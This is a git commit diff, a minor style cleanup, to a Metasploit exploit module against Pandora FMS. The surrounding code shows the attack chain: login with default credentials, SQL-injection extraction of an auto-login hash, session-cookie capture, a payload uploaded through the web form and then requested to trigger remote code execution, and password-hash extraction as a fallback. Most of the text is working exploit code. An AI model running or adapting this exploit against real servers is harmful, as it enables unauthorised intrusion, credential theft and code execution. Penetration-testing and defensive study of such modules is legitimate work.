Do minor cleanup
jvazquez-r7
parent
6ceb47619a
commit
674ceeed40
|
|
@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return auth_succeeded?(res)
|
||||
end
|
||||
|
||||
def loginhash
|
||||
def login_hash
|
||||
print_status("#{peer} - Attempting to extract auto login hash")
|
||||
# Generate random string and convert to hex
|
||||
sqlq = rand_text_alpha(8)
|
||||
|
|
@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def auth_succeeded?(res)
|
||||
if res && res.code == 200 && res.body.include?("Welcome to Pandora FMS")
|
||||
if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
|
||||
print_status("#{peer} - Successfully authenticated!")
|
||||
print_status("#{peer} - Attempting to retrieve session cookie")
|
||||
@cookie = res.get_cookies
|
||||
|
|
@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("#{peer} - Authentication failed!")
|
||||
end
|
||||
|
||||
return false
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
|
|
@ -249,7 +249,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("#{peer} - Upload will fail!")
|
||||
return false
|
||||
end
|
||||
|
||||
else
|
||||
print_error("#{peer} - Could not identify upload form!")
|
||||
end
|
||||
|
|
@ -272,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, "index.php"),
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'data' => data,
|
||||
'vars_get' => {
|
||||
|
|
@ -292,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, "images", @payload_name),
|
||||
'cookie' => @cookie
|
||||
})
|
||||
}, 1)
|
||||
end
|
||||
|
||||
|
||||
|
|
@ -300,13 +299,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# First try to authenticate using default or user-supplied credentials
|
||||
if authenticate
|
||||
upload
|
||||
elsif loginhash
|
||||
# If default credentials fail, try to extract loginhash via SQLi
|
||||
# If default credentials fail, try to extract loginhash via SQLi
|
||||
elsif login_hash
|
||||
upload
|
||||
extract
|
||||
# In the worst case, try to extract password hash
|
||||
else
|
||||
@rce_failed = true
|
||||
# If all else fails extract password hash and exit
|
||||
extract
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to perform remote code execution!")
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue